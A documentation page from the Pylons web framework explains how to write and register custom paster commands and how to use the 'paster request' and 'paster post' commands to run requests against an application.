Adding commands to Paster¶ Paster command¶ The command line will be paster my-command arg1 arg2 if the current directory is the application egg, or paster --plugin=MyPylonsApp my-command arg1 arg2 otherwise. In the latter case, MyPylonsApp must have been installed via easy_install or python setup.py develop. Make a package directory for your commands: $ mkdir myapp/commands $ touch myapp/commands/__init__.py Create a module myapp/commands/my_command.py like this: from paste.script.command import Command class MyCommand(Command): # Parser configuration summary = "--NO SUMMARY--" usage = "--NO USAGE--" group_name = "myapp" parser = Command.standard_parser(verbose=False) def command(self): import pprint print "Hello, app script world!" print print "My options are:" print " ", pprint.pformat(vars(self.options)) print "My args are:" print " ", pprint.pformat(self.args) print print "My parser help is:" print print self.parser.format_help() Note The class _must_ define .command, .parser, and .summary Modify the entry_points argument in setup.py to contain: [paste.paster_command] my-command = myapp.commands.my_command:MyCommand Run python setup.py develop or easy_install . to update the entry points in the egg in sys.path. Now you should be able to run: $ paster --plugin=MyApp my-command arg1 arg2 Hello, MyApp script world! My options are: {'interactive': False, 'overwrite': False, 'quiet': 0, 'verbose': 0} My args are: ['arg1', 'arg2'] My parser help is: Usage: /usr/local/bin/paster my-command [options] --NO USAGE-- --NO SUMMARY-- Options: -h, --help show this help message and exit $ paster --plugin=MyApp --help Usage: paster [paster_options] COMMAND [command_options] ... myapp: my-command --NO SUMMARY-- pylons: controller Create a Controller and accompanying functional test restcontroller Create a REST Controller and accompanying functional test shell Open an interactive shell with the Pylons app loaded Required class attributes¶ In addition to the .command method, the class should define .parser and .summary. Command-line options¶ Command.standard_parser() returns a Python OptionParser. Calling parser.add_option enables the developer to add as many options as desired. Inside the .command method, the user’s options are available under self.options, and any additional arguments are in self.args. There are several other class attributes that affect the parser; see them defined in paste.script.command:Command. The most useful attributes are .usage, .description, .min_args, and .max_args. .usage is the part of the usage string _after_ the command name. The .standard_parser() method has several optional arguments to add standardized options; some of these got added to my parser although I don’t see how. See the paster shell command, pylons.commands:ShellCommand, for an example of using command-line options and loading the .ini file and model. Also see “paster setup-app” where it is defined in paste.script.appinstall.SetupCommand. This is evident from the entry point in PasteScript ( PasteScript-VERSION.egg/EGG_INFO/entry_points.txt). It is a complex example of reading a config file and delegating to another entry point. The code for calling myapp.websetup:setup_config is in paste.script.appinstall. The Command class also has several convenience methods to handle console prompts, enable logging, verify directories exist and that files have expected content, insert text into a file, run a shell command, add files to Subversion, parse “var=value” arguments, add variables to an .ini file. Using paster to access a Pylons app¶ Paster provides request and post commands for running requests on an application. These commands will be run in the full configuration context of a normal application. Useful for cron jobs, the error handler will also be in place and you can get email reports of failed requests. Because arguments all just go in QUERY_STRING, request.GET and request.PARAMS won’t look like you expect. But you can parse them with something like: parser = optparse.OptionParser() parser.add_option(etc) args = [item[0] for item in cgi.parse_qsl(request.environ['QUERY_STRING'])] options, args = parser.parse_args(args) paster request / post¶ Usage: paster request / post [options] CONFIG_FILE URL [OPTIONS/ARGUMENTS] Run a request for the described application This command makes an artifical request to a web application that uses a paste.deploy configuration file for the server and application. Use ‘paster request config.ini /url’ to request /url. Use ‘paster post config.ini /url < data’ to do a POST with the given request body. If the URL is relative (i.e. doesn’t begin with /) it is interpreted as relative to /.command/. The variable environ['paste.command_request'] will be set to True in the request, so your application can distinguish these calls from normal requests. Note that you can pass options besides the options listed here; any unknown options will be passed to the application in environ['QUERY_STRING']. Options: -h, --help show this help message and exit -v, --verbose -q, --quiet -n NAME, --app-name=NAME Load the named application (default main) --config-var=NAME:VALUE Variable to make available in the config for %()s substitution (you can use this option multiple times) --header=NAME:VALUE Header to add to request (you can use this option multiple times) --display-headers Display headers before the response body Future development¶ A Pylons controller that handled some of this would probably be quite useful. Probably even nicer with additions to the current template, so that /.command/ all gets routed to a single controller that uses actions for the various sub-commands, and can provide a useful response to /.command/?-h, etc.
http://docs.pylonsproject.org/projects/pylons-webframework/en/latest/advanced_pylons/paster_commands.html
CC-MAIN-2015-40
refinedweb
885
50.23
[SOLVED] LoPy LoRa general consumption/effiency (code and scope printscreen) Hello, please sit down because I have a long post about LoRa: -my main objective is to send some sensor data via LoRa from one LoPy to onother, then deepsleep. -the code is simple and practical, but there where some strange details: from network import LoRa import socket import time import binascii import pycom from pysense import Pysense import machine from SI7006A20 import SI7006A20 from LTR329ALS01 import LTR329ALS01 from MPL3115A2 import MPL3115A2,ALTITUDE,PRESSURE import json py = Pysense() si = SI7006A20(py) lt = LTR329ALS01(py) mp = MPL3115A2(py,mode=ALTITUDE) mpp = MPL3115A2(py,mode=PRESSURE) data1=mp.temperature() data2=mpp.pressure() data3=si.humidity() data4=lt.light() data = "%.0d %.0d %.0d %.0d" % (data1,data2,data3,data4) lora = LoRa(mode=LoRa.LORA) s = socket.socket(socket.AF_LORA, socket.SOCK_RAW) s.setsockopt(socket.SOL_LORA, socket.SO_DR, 5) lora.nvram_restore() s.setblocking(False) for x in range (3): s.setblocking(False) s.send(data) time.sleep(0.2) s.setblocking(True) s.send(data) time.sleep(0.2) s.setblocking(False) py.setup_sleep(1) py.go_to_sleep() That is the current conspumtion, as you can see it wakes up, has a little delay, I send the same data 6 times and then deepsleep. The reason I send it 6 times is because it is not recieved verry well and I hope that from 6 times it will be recieved at least once. Besides that sometimes works ONLY when setblocking is FALSE and other times ONLY when it's TRUE (don't understand why). The sollution is not verry practical, the 2 LoPy's where at 30cm distance and the transmision was poor. So I decided to see if is there a correspondance between message length and probability of reception. I made a code when it sends first 10 characters, then 20, and then 40 (between them I have rgb lights just for reference), the code: from network import LoRa import socket import time import pycom from pysense import Pysense pycom.heartbeat(False) py = Pysense() lora = LoRa(mode=LoRa.LORA, tx_power=18, sf=6 ,frequency=863000000) s = socket.socket(socket.AF_LORA, socket.SOCK_RAW) s.setblocking(False) pycom.rgbled(0xffffff) time.sleep(0.5) pycom.heartbeat(False) s.send('1234567890') pycom.rgbled(0xffff00) time.sleep(0.1) pycom.heartbeat(False) s.send('12345678901234567890') pycom.rgbled(0x0000ff) time.sleep(0.1) pycom.heartbeat(False) s.send('1234567890123456789012345678901234567890') #and another one with 80 characters that doesn't fit in the screen pycom.rgbled(0x00ff00) time.sleep(0.2) py.setup_sleep(15) py.go_to_sleep() With the following consumption: With a little zoom on the transmission : - This is verry dissapointing : the transmission length is the same wether I send 10, 20, 40 or 80 characters, why is that ? - What are those spikes right before the transmission ? - Why it takes 10,4 ms to send it ? When is used the function chrono.start() / chrono.read() / chrono.stop() it indicated only 70 us - How can I improve the transmission efficiency (tx-power ? spread factor ? frequency ?) Thanks for your pacience and hope for the best ! Hello @braulio. I think the extra milliseconds are from Lopy info processing, you can try with a different number (10 seconds, 20, 30 etc) and the "extra" time is the same then you have a solution. Also you hsould try to make a new post, the topic is quite different from this one. Please Help me in this code. import time chrono = Timer.Chrono() ... chrono.start() time.sleep(5) chrono.stop() .... print(chrono.read()) I measure 5023 seconds. How can I make accurate measurements?. It should be 5 seconds I am in equal measure happy and mad, the ONLY problem regarding the transmission quality was the SF, at the default value it had the biggest problems but when I put it to 12(maximum) it worked just fine (in short distances too). Altough it is an old post I hope that someone with the same problem with find this answer usefull in the future! Solved the TX part using the functions chrono.start() / chrono.read() / chrono.stop() among lora.callback() and lora.events() It now takes 28ms to send 1 character, 58ms to send 20, 115ms to send 60 and so on... @iplooky Hard to say what's wrong. I made my first test with the lopy-lopy examples, and they worked ok, as long as I started lopy-b first. No problem with a short distance. I have also set up a LoPy as TTN gateway and a FiPy a TTN node, and walked away like 500m from the gateway. Still at rrsi of -100, being able to send and receive messages. I also receive messages at the gateway from nodes like 3 km away, estimated from the rssi level of -126 to -130. I'll try some larger (than 500m) distances later. @robert-hh poor transmission means the following: if I want to send a short message (7characters) it is a slightly chance to recieve it from the first time ( but still I send it 6 times consecutively just to be shure ), 10,20,40 or 80 characters have a nearly to 0 chance to be recieved. (10 meters, SF=7/DR=5 , TX_power=20 ) @jmarcelino so: lora = LoRa(mode=LoRa.LORA, tx_power=20 , sf=7 ,frequency=863000000) #europe 863MHz s = socket.socket(socket.AF_LORA, socket.SOCK_RAW) s.setblocking(False) should work just fine ? - jmarcelino last edited by @iplooky In LoRa mode the socket.SO_DR socket options are ignored, those are meant for LoRaWAN mode. For LoRa please set all these parameters at init time in your LoRa() call, for LoRaWAN set it via socket options. @jmarcelino the reciever code should be the same in any case or do I need there to modify Lora's paramethers too? I mean : from network import LoRa import socket import time lora = LoRa(mode=LoRa.LORA, rx_iq=True ,frequency=863000000) s = socket.socket(socket.AF_LORA, socket.SOCK_RAW) s.setsockopt(socket.SOL_LORA, socket.SO_DR, 5) s.setblocking(False) print("start") while True: mesaj = s.recv(64) if(mesaj != b''): print(mesaj) ..should be a universal code OR should I try to modify there too ?(DR,SF,freq) Also: - from what i've understand DR and SF are complementary, if DR is 5 that means automatically that SF is 7 (and therefore I should not modify it because it's known already from DR) ? - tx_power=20 should have also a rx_power=20 or just rx_iq=True ? - putting the 2 lopy's at several meters and testing the code has the same bad results (poor transmission) - jmarcelino last edited by @iplooky TX Power = 20dBm isn't legal in Europe for most channels (there are some exceptions), by law it should be 14dBm. But yes it generally would greatly increase the signal (at the cost of higher power consumption). @jmarcelino would tx_power = 20 (the maximum value) influence in any way ? (in comparison with the default value?) I've read one of your old posts : but being 7 month old I was wondering if updates/imporvements appeared. - jmarcelino last edited by jmarcelino It's not possible to have accurate DR to distances calculations. What you can know is what is the lowest SNR at which a signal can be decoded and that depends on the spreading factor: Higher spreading factors mean lower data rates. So at SF7 (or DR5) you can decode up to SNR -7.5, at SF12 (DR0) you can go as low as -20 so effectively being able to pick up weaker signals. However three problems: At SF12 you can see transmission of 10 bytes takes 1483ms, this means that (considering Europe's) duty cycle restrictions of 1% mean you'll need to wait a very long time until you can transmit again on that channel: 131 seconds! Also it means you have the radio full on for that time consuming more energy Finally since the transmission takes so long you're also at higher risk of collision/interference from other transmitters operating on the same frequency. @iplooky The slowest data rates (smallest DR number and largest SF) have in theory the longest coverage. With devices in the same room, DR5 (SF7) should be more than enough. If you want to test long-distance, you'll probably go for DR0 (SF12). You can adjust the actual DR based on the received signal levels (RSSI and SNR). @robert-hh If I did understand correct, I should lower the DR in order to increase the chance te recieve the message, in my case it is aprox. 20 characters long so DR=1 should work just fine Is there a datasheet where I can see the correspondance SF - distance ? @iplooky DR = Data Rate. The time needed to send a byte depends on the data rate setting. The default here is 5 alas DR5. = 5470 bit per second. At that data rate, even mesages with the shortest payload take about 20ms airtime. The join request/accept message ar on air for instance about 70 ms, the test messages from the example with 6 bytes payload take about 30 ms. @robert-hh don't quite know what means DR and where to modify it @jcaron I didn't disable the wi-fi, I will try it next time I have acces to the scope @rcolistete ok, will try to increase the distance between the Lopy's I don't quite know what paramethers to modify and how much to modify them, will try to measure the transmision time with chrono.start() and chrono.stop() when recieved the ackowledge signal (assuming the transmision is made 100% accurate) - rcolistete last edited by You've said : " the 2 LoPy's where at 30cm distance and the transmision was poor." while LoRa has problems for low distances, depending on its configuration (SF, BW, tx_power), because it saturates the amplifier. Solution is simple : put both LoPy separated by some meters. Also, my experience with "setblocking(True)" isn't good*, so I suggest to avoid using it. (*) : any send is a lot slower when "setblocking(True)" is chosen and Terminal is running. Regarding the spikes, they do not seem to be related to transmission, as they are present during the whole active time of the LoPy. They seem to be every 100 ms, i.e. 10 Hz. As they start quite early, they're probably related to something started by the system. Have you disabled Wi-Fi on boot? @iplooky You may also look into the picture here, Where you can see the sensing of a OTAA Join request and response. The actual time on air is like 70 ms at DR5.
https://forum.pycom.io/topic/2760/solved-lopy-lora-general-consumption-effiency-code-and-scope-printscreen/?lang
CC-MAIN-2019-22
refinedweb
1,769
62.58
On 05/04/2012 12:51 PM, Laine Stump wrote: > This value will be needed to set the src_pid when sending netlink > messages to lldpad. It is part of the solution to: > > > > Note that libnl's port generation algorithm guarantees that the > nl_socket_get_local_port() will always be > 0, so it is okay to cast > the uint32_t to int (thus allowing us to use -1 as an error sentinel). I had to look; we always let libnl generate a socket, and indeed the libnl code: returns a uint32_t, but computes that value as 'pid + (n << 22);', where n is at most 32, and where pid is at most PID_MAX_LIMIT of 2^22, so the end result is less than 31 bits and therefore positive when cast to int. Maybe it would help to tweak the wording a bit: Note that libnl's port generation algorithm guarantees that the uint32_t result of nl_socket_get_local_port() will never set the most significant bit, and therefore will be positive when cast to int, allowing us to use -1 as an error sentinel. > /** > + * virNetlinkEventServiceLocalPid: > + * > + * Returns the nl_pid value that was used to bind() the netlink socket > + * used by the netlink event service, or -1 on error (netlink > + * guarantees that this value will always be > 0). > + */ > +int virNetlinkEventServiceLocalPid(void) > +{ > + if (!(server && server->netlinknh)) { > + netlinkError(VIR_ERR_INTERNAL_ERROR, "%s", > + _("netlink event service not running")); > + return -1; > + } > + return (int)nl_socket_get_local_port(server->netlinknh); Technically, the cast is redundant, but I'm okay if you leave it in. ACK; this one can technically be applied without test results, although it doesn't hurt to wait for the rest of the series. -- Eric Blake eblake redhat com +1-919-301-3266 Libvirt virtualization library Attachment: signature.asc Description: OpenPGP digital signature
https://www.redhat.com/archives/libvir-list/2012-May/msg00350.html
CC-MAIN-2014-10
refinedweb
286
52.83
Normally, if you have a private method, you can’t call it with an explicit receiver, even if that receiver is self. So you can’t say def foo self.bar # explicit receiver end private def bar 123 end Instead, foo needs to call simply bar, leaving the self implicit: def foo bar # implicit receiver end However, when you call setters, you always need an explicit receiver, or you’ll just assign a local variable: def assign_things self.a = 123 b = 456 end def a=(v) puts "This one gets called." end def b=(v) raise "This one never does; the other method makes a local called `b` instead." end So, what do you do if you have a private setter? You call it with an explicit receiver: def assign_things self.a = 123 end private def a=(v) puts "This is called successfully." end There’s a crazy special exception in Ruby that lets you use an explicit receiver of self with a setter just so that you can call private setters. This strikes me as weird. Why can’t you call any private method explicitly on self? I thought it was just easier to implement Ruby if you couldn’t, but if they made it work for setters, I’m not sure what the big deal is.
http://pivotallabs.com/private-setters-in-ruby-what-to-do/
CC-MAIN-2014-35
refinedweb
218
71.04
IRC log of tagmem on 2006-04-04 Timestamps are in UTC. 17:09:42 [RRSAgent] RRSAgent has joined #tagmem 17:09:42 [RRSAgent] logging to 17:09:44 [Zakim] +TimBL 17:09:59 [ht] scribe: raman 17:10:08 [ht] chair: Vincent Quint 17:10:14 [ht] meeting: TAG telcon 17:10:24 [ht] scribenick: raman 17:10:25 [timbl] timbl has joined #tagmem 17:10:40 [DanC] raman, it's traditional to have the machine draft minutes, then edit them and check them in under /2001/tag/YYYY/MM, and then mail a pointer to www-tag. But practice varies considerably. 17:11:35 [raman] so you dont want me to scribe on IRC? 17:11:54 [DanC] sorry, yes... the machine drafts then based on what you write in IRC 17:11:59 [DanC] drafts them 17:12:06 [raman] I'd prefer to just type in here --- dont have cycles to turn it into a new work activity of its own:-) 17:13:06 [raman] last week's minutes approved subject to HT's final edits. 17:14:38 [DanC] (henry, so the minutes will stay at ? I want their address in today's minutes) 17:14:51 [ht] DanC, yes. 17:15:26 [DanC] q+ 17:15:58 [Norm] So do we have tentative dates in Oct? 17:16:08 [Norm] Yes, nevermind. 17:19:54 [DanC] I prefer a 2 day meeting. I'm not sure I can muster 3 days of steam. 17:20:24 [Vincent] ack danc 17:20:53 [raman] also issue: Venice is a long way to travel for 2 days 17:22:11 [DanC] ACTION DanC: explore Venice meeting venue 17:23:34 [DanC] q+ to note a possible conflict with the June meeting 17:24:05 [DanC] -> June meeting logistics 17:26:27 [Vincent] ack danc 17:26:27 [Zakim] DanC, you wanted to note a possible conflict with the June meeting 17:26:33 [raman] ACTION: Norm to send hotel details in a week 17:27:36 [raman] Vincent: AC Meeting At WWW 2006 Edinburgh 17:27:45 [raman] Tag Summary to be reviewed by email 17:28:36 [raman] Possible TAG session at AC Meeting 17:36:37 [raman] Conclusion: no active TAG interest in adding to AC Meeting agenda 17:39:14 [ht] is now cleaned up 17:39:33 [DanC] -> our recent WD 17:44:50 [raman] HT: Introduces URN discussion 17:44:58 [ht] 17:45:01 [DanC] following my nose from the agenda, I get 1.7 2006/04/04 16:32:06 ; can anybody confirm? 17:45:11 [ht] yes, DanC 17:47:39 [raman] HT: Document covers a number of different proposals/patterns of use for new URI schemes etc. --- identify things we think of as information resources 17:48:07 [raman] HT: reorged to make section2 a simple, short summary of why the TAG doesn't think that for many purposes such things are different from http: in interesting ways. 17:48:16 [DanC] (implicit? darn.) 17:48:19 [raman] If not, then you shouldn't be forking the Web 17:48:37 [raman] HT: would like feedback on the document style --- and also wants input on sections 2.7 and 2.8 17:48:57 [timbl] ?NRI 17:49:03 [Norm] "New Resource Identifiers" I expect 17:49:08 [raman] DanC: NRI is jarring 17:49:46 [DanC] "recent proposals ([RFC 3688], [oasis URN], [XRI])" 17:49:47 [raman] HT: we're not just responding to XRIs --- we want to cover anyone who wants to mint a new namespace for electronic resources e.g. New Zealand Govt 17:50:10 [raman] DanC: suggests adding info: 17:50:17 [raman] TimBL we can discuss Info: 17:50:25 [ht] s/new namespace/new URN subspace/ 17:50:35 [raman] TimBL: convinced XRIs are a bad idea, not sure if info: is any worse than mailto: 17:50:45 [raman] DanC: info: looks exactly like XRI 17:51:15 [raman] Some confusion as to how info: thingies are resolved 17:53:59 [raman] tvr: recommend not using an acronym like NRI 17:55:26 [timbl] nRI 17:55:28 [timbl] _RI 17:58:05 [raman] TimBL: one of the problems with HTTP is that one cannot get a URI space for ever. 17:58:14 [raman] TimBL: perhaps pull that out as an issue? 17:58:38 [raman] Perpetual Resource Identifiers? 17:59:56 [raman] HT: believes that the XRI spec as it stands no longer claims to solve/address the perpetual resource problem, since they also use DNS for resolution 18:01:35 [DanC] q+ 18:02:12 [DanC] q+ to say yes, timbl, let's hope folks considering DAV: and dix: URIs schemes _will_ look here 18:02:48 [DanC] [[ 18:02:48 [DanC]. 18:02:49 [DanC] ]] 18:02:51 [raman] HT: as we've worked on the finding, we have moved towards DanC's position -- 18:02:56 [raman] DanC pastes it in below 18:02:59 [DanC] right under 3 The value of http: URIs 18:03:08 [Vincent] ack danc 18:03:08 [Zakim] DanC, you wanted to say yes, timbl, let's hope folks considering DAV: and dix: URIs schemes _will_ look here 18:03:29 [timbl] q+ to suggest a title "The dangers of URNs and Registries" 18:04:01 [timbl] or "the poverty of" 18:04:03 [Vincent] ack timbl 18:04:03 [Zakim] timbl, you wanted to suggest a title "The dangers of URNs and Registries" 18:04:23 [timbl] q- 18:04:50 [DanC] (formatting around 2.7 Rich authority is goofy) 18:05:06 [raman] HT: 2.6 URI for an object vs URI to the metadata for that object 18:05:18 [raman] HT: what do people think? 18:05:30 [timbl] q+ 18:05:45 [DanC] (this is another place where I'd find a full survey more useful.) 18:06:40 [Vincent] ack timbl 18:07:00 [raman] HT: clarifies that here metadata is not http header like metadata in response to question: if you have a uri to metadata and uri to object, then how do you keep them in sync? 18:07:13 [DanC] q+ to note that the state-of-the art in metadata is the <link> 18:07:55 [DanC] q+ to note that the state-of-the art in metadata is the <link> element and Link: HTTP header; see widespread practice with RSS feeds associated with web pages, but also navigational links, and in-development work on quality ratings etc. 18:08:09 [ht] The kind of metadata people are looking for in the nRI case is things such as dc:creator etc. 18:08:29 [timbl] Link: 18:09:22 [raman] TimBL: given foo.html then foo.html,meta might give you a lot of extensible metadata 18:09:31 [Vincent] ack danc 18:09:31 [Zakim] DanC, you wanted to note that the state-of-the art in metadata is the <link> and to note that the state-of-the art in metadata is the <link> element and Link: HTTP header; see 18:09:34 [Zakim] ... widespread practice with RSS feeds associated with web pages, but also navigational links, and in-development work on quality ratings etc. 18:10:23 [ht] HST notes that this only works for HTML 18:10:33 [DanC] the Link: header field works 18:11:20 [ht] HST asks for what value of 'works' 18:11:42 [raman] 18:12:24 [timbl] Cool by design (tm) 18:13:34 [DanC] I know somthine bout what trustred resolution _might_ mean, but I was hoping to take advantage of henry's survey work 18:13:34 [raman] DO: reviewing Section 4 18:14:15 [DanC] (huh? I thought the point of URIs is that they're context free; i.e. that The Web is _the_ context.) 18:15:15 [ht] q+ to say that XRIs _are_ meant to be dereferencable 18:16:16 [DanC] (btw, timbl, on permanent domains, note that example.org is permanently allocated by the IETF, i.e. the DNS technical standardization body. I think it's probably efficient to just do that again whenever necessary.) 18:18:13 [Vincent] ack ht 18:18:13 [Zakim] ht, you wanted to say that XRIs _are_ meant to be dereferencable 18:20:13 [DanC] q+ to note that there are scheme-independent resolution mechanisms (DDS)... 18:22:16 [raman] DO: XRIs use XRI namespace for XRI descriptors 18:22:33 [Vincent] ack danc 18:22:33 [Zakim] DanC, you wanted to note that there are scheme-independent resolution mechanisms (DDS)... 18:22:45 [DanC] q+ to note that there are scheme-independent resolution mechanisms (DDS)... 18:23:01 [ht] DO, HST to consider two examples, one using URNs for namespaces and one using XRIs for documents 18:23:09 [Vincent] ack danc 18:23:09 [Zakim] DanC, you wanted to note that there are scheme-independent resolution mechanisms (DDS)... 18:23:09 [raman] DO: Suggest splitting into two examples A) namespaces a la oasis B) documents that are meant to be location independent 18:23:35 [raman] DanC idea of a uri scheme that cannot be looked up sounds absurd 18:24:47 [raman] TimBL: shall we set up a W3C resolver that does its best to resolve any types of resource? 18:25:05 [DanC] (that was suggested in jest, I'm pretty sure) 18:25:58 [DanC] q+ to ask what's the path from here to XRI proponents 18:26:17 [timbl] can only be used for dereferencing undereferencable URIs 18:27:32 [Vincent] ack danc 18:27:32 [Zakim] DanC, you wanted to ask what's the path from here to XRI proponents 18:28:57 [dorchard] I can take another swag at 2 example.s 18:30:21 [Zakim] -DOrchard 18:30:28 [Zakim] -Norm 18:30:30 [Zakim] -Ht 18:30:33 [DanC] RRSAgent, please draft minutes 18:30:33 [RRSAgent] I have made the request to generate DanC 18:30:36 [Zakim] -TimBL 18:31:16 [DanC] RRSAgent, make logs world-access 18:31:30 [Zakim] -Vincent 18:31:37 [Zakim] -raman 18:31:39 [DanC] raman, can you start with , edit it a bit, and send it to www-tag? 18:32:46 [DanC] i/last week's/Topic: Convene, take roll, review records and agenda/ 18:32:50 [DanC] RRSAgent, please draft minutes 18:32:50 [RRSAgent] I have made the request to generate DanC 18:33:09 [DanC] Zakim, list attendees 18:33:09 [Zakim] As of this point the attendees have been Ht, DOrchard, Norm, +1.347.661.aaaa, DanC, Vincent, raman, TimBL 18:33:11 [DanC] RRSAgent, please draft minutes 18:33:11 [RRSAgent] I have made the request to generate DanC 18:33:15 [Zakim] -DanC 18:33:16 [Zakim] TAG_Weekly()12:30PM has ended 18:33:17 [Zakim] Attendees were Ht, DOrchard, Norm, +1.347.661.aaaa, DanC, Vincent, raman, TimBL 18:34:11 [DanC] i/AC Meeting At WWW 2006 Edinburgh/Topic: AC Meeting At WWW 2006 Edinburgh/ 18:34:14 [DanC] RRSAgent, please draft minutes 18:34:14 [RRSAgent] I have made the request to generate DanC 18:34:51 [DanC] i/URN discussion/Issue URNsAndRegistries-50/ 18:34:59 [DanC] RRSAgent, please draft minutes 18:35:00 [RRSAgent] I have made the request to generate DanC 18:35:22 [DanC] Regrets: Noah, Ed 18:35:24 [DanC] RRSAgent, please draft minutes 18:35:24 [RRSAgent] I have made the request to generate DanC 18:36:02 [DanC] i/HT: Introduces URN discussion/Issue URNsAndRegistries-50/ 18:36:05 [DanC] RRSAgent, please draft minutes 18:36:05 [RRSAgent] I have made the request to generate DanC 18:36:37 [DanC] i/HT: Introduces URN discussion/Topic: Issue URNsAndRegistries-50/ 18:36:41 [DanC] RRSAgent, please draft minutes 18:36:41 [RRSAgent] I have made the request to generate DanC 18:37:13 [DanC] there. that should do. 19:18:10 [Norm] Norm has joined #tagmem 19:56:06 [Norm] Norm has joined #tagmem 20:03:22 [timbl] timbl has left #tagmem
http://www.w3.org/2006/04/04-tagmem-irc
CC-MAIN-2014-42
refinedweb
2,033
58.35
I have an assignment (so please don't give me code just an explanation/helpful hints). Basically I divide two integers that are input by the user (e.g. 8 & 13) and store the result in a double. So if I were to do 8/13 I would get 0.615384615384615384615384... The user also enters another number n. This is the number they want after the decimal place. With the example above if the user entered 8 13 5 then they would get the digit 8 as it is the 5th digit after the decimal point. I tried converting to a string using sprintf and searching through it from the position where the decimal point is and it works but it doesn't work for large numbers (i.e. 8 13 60000). So I am trying another way where I am trying to multiply out the decimal point from the double. However I am unsure how to go about doing this. #include <stdio.h> #include <math.h> main() { int a; //First number to divide int b; //Second number to divide int n; //Number after decimal point to print int i; double divAnswer = 0; double fractional; double integer; scanf("%d %d %d", &a, &b, &n); divAnswer = (double)a/(double)b; fractional = modf(divAnswer, &integer); printf("%f", fractional); printf("\n%lf", pow(fractional, n)); } As you can see I am trying to use pow but i'm not sure how to go about doing it. Any help would be appreciated.
http://www.dreamincode.net/forums/topic/267039-getting-the-nth-integer-from-a-double/
CC-MAIN-2016-30
refinedweb
248
71.75
27 April 2010 12:47 [Source: ICIS news] LONDON (ICIS news)--Celanese plans to close its ?xml:namespace> The consolidation would strengthen its competitive position, reduce fixed costs and align future production capacities with anticipated demand, the chemical company said. Initially, the proposed closure would lead to a non-cash impairment charge of $72m (€54m) in the first quarter of 2010, Celanese said. If the company proceeded with the closure, Celanese would operate the Spondon plant - which has 460 employees - to late 2011. The company would consult with labour unions over the proposed closure, it said. Key products manufactured at the Spondon plant include cellulose acetate flake and filter tow. The plant’s nameplate capacity is 41,000 tonnes of acetate tow and 60,000 tonnes of acetate flake, according to Celanese. Under the proposal, Celanese would optimise its global production network, which includes facilities
http://www.icis.com/Articles/2010/04/27/9354282/celanese-to-close-uk-acetate-plant-in-consolidation-strategy.html
CC-MAIN-2015-06
refinedweb
145
53.92
reg tutorial reg tutorial I'm using netbeans 7.2.1. I followed the steps of the tutorial as given in webservices can any one tell me how to develop and execute ---------- j2ee webservices example in weblogic server with (netbeans or eclipse webservice in Netbeans provided() im getting problem at 17 th step while right clicking on the source code im not getting..... im using netbeans version 6.9.1 .. pls help me out... regards-- Harish Kumar WebServices In JAVA WebServices In JAVA need sample example for webservice in java platform(web application) Hi, Please check Web Services Examples in NetBeans. Thanks Application Using JAX-RPC Application Using JAX-RPC Project Requirement Make a Netbeans Web Project.In it develop a Web Service application using the JAX-RPC concept.The Web Service should have operation for interest Webservices Sending emails and insert into trable AJAX IM AJAX IM ajax im ("asynchronous javascript and xml instant messenger"... is updated in real-time via JavaScript. Ajax IM (Ajax Instant Messenger about jax-ws - WebSevices about jax-ws i want a pdf or document on (basic and clear idea on) JAX-WS webservices in java webservices in java what is the real time use of webservices in java how to insert data from netbeans into databse how to insert data from netbeans into databse how to insert data from netbeans into databse Please visit the following link: NetBeans NetBeans why Netbeans IDE is not commonly used Today by most of the companies NetBeans NetBeans Hi, I am Kundan I have made a project on NetBeans. And now I want to know that how can i run my project without NetBeans IDE,on other PC. Please help me it's important WebServices In Java WebServices In Java Need Web Services Examples in eclipse. Regards, Sathya JAX-RPC Advance Concepts JAX-RPC Advance Concepts  ...: Use the netbeans Make a stud table in the jdbc:derby... database This is a small database software bundled with Netbeans Hi, I have a problem in webservices. I have defined a service which shoud read the xml file from the clientside and read the values... for more information. Complete example of JQuery with JAX im new to java - Java Beginners im new to java what is the significance of public static void main(string args[])statement Hi Friend, This statement is necessary for a java class to execute it as a command line application. public- It provide...:// big doubt Reading big file in Java Reading big file in Java How to read a big text file in Java program? Hi, Read the complete tutorial at How to read big file line by line in java? Im getting this error while running JPA project Im getting this error while running JPA project Exception in thread "main" javax.persistence.PersistenceException: [PersistenceUnit: examplePersistenceUnit] Unable to configure EntityManagerFactory IBM Big data capabilities IBM Big data capabilities What are the capabilities of the IBM Big data System? IBM Big Data Management system provides unlimited capabilities: Here is the brief of the IBM Big Data Management System: Data Web Service Web Services with NetBeans IDE Creating webservices in NetBeans. In this example program I will show you how you can make webservices in the Netbeans IDE. NetBeans IDE provides necessary GUI webservices in websphere server using eclipse webservices in websphere server using eclipse can websphere server used instead of tomcat??...if so any changes to be made? Please elaborate JNI & webservices - WebSevices java Big - Java Beginners java program_big digits multiplication.. java program_big digits multiplication.. i want program about big digits multiplication program using java..plz tel me answer java netbeans java netbeans i am making project in core java using Netbeans. Regarding my project i want to know that How to fetch the data from ms-access... using netbeans RMI and netbeans RMI and netbeans how to use Rmi in netbeans? i want to connect to a server machine which is holding my application and need to identify the systems connected in LAN with it and get the IP address from it i wnt to use netbeans... The TicTacToe class contains a 3x3 two-dimensional array of integers... a two human player game of Tic-Tac-Toe. Using the NetBeans design tool also create Netbeans Question. Netbeans Question. Ok here is my code- * * To change this template, choose Tools | Templates * and open the template in the editor. */ import java.util.Random; /** * */ public class ContinueRollDie { * @param args netbeans program netbeans program Hi. could someone build this for me in netbeans please :) You are required to create a basic library management system for use with books. A Graphical User Interface (GUI) is not required, i.e. your program Very Big Problem - Java Beginners Very Big Problem Write a 'for' loop to input the current meter reading and the previous meter reading and calculate the electic bill with the following conditions(all must be fulfilled in one class only): (i)if unit(current Why Big Data is important for Enterprises? Why Enterprises are looking for Big Data? What are the importance of Big Data in enterprises? In this article we will understand the importance of Big Data and see the benefits of Big Data for enterprises. The Big Data software can i use big query in hibernate? can i use big query in hibernate? can i use big query in hibernate Java Big Problem - Java Beginners Java Big Problem Input the current meter reading and the previous meter reading and calculate the electic bill with the following conditions(all must be fulfilled in one class only): (i)if unit(current meter reading - previous What is Big Data? The Big data is a term used for the massive data set which very difficult.... This article is discussing about the Big data. An Example of Big Data... structured and most of the cases it is incomplete. By many Big Data Add two big numbers Add two big numbers In this section, you will learn how to add two big numbers. For adding two numbers implement two big decimal numbers then apply the Sum() method Netbeans GUI Ribbon Netbeans GUI Ribbon how to create ribbon task in java GUI using netbeans RMI in netbeans 6.5 RMI in netbeans 6.5 runing client in RMI using netbeans 6.5 Add two big numbers - Java Beginners Add two big numbers - Java Beginners Hi, I am beginner in Java and leaned basic concepts of Java. Now I am trying to find example code for adding big numbers in Java. I need basic Java Beginners example. It should easy JNDI names in netbeans JNDI 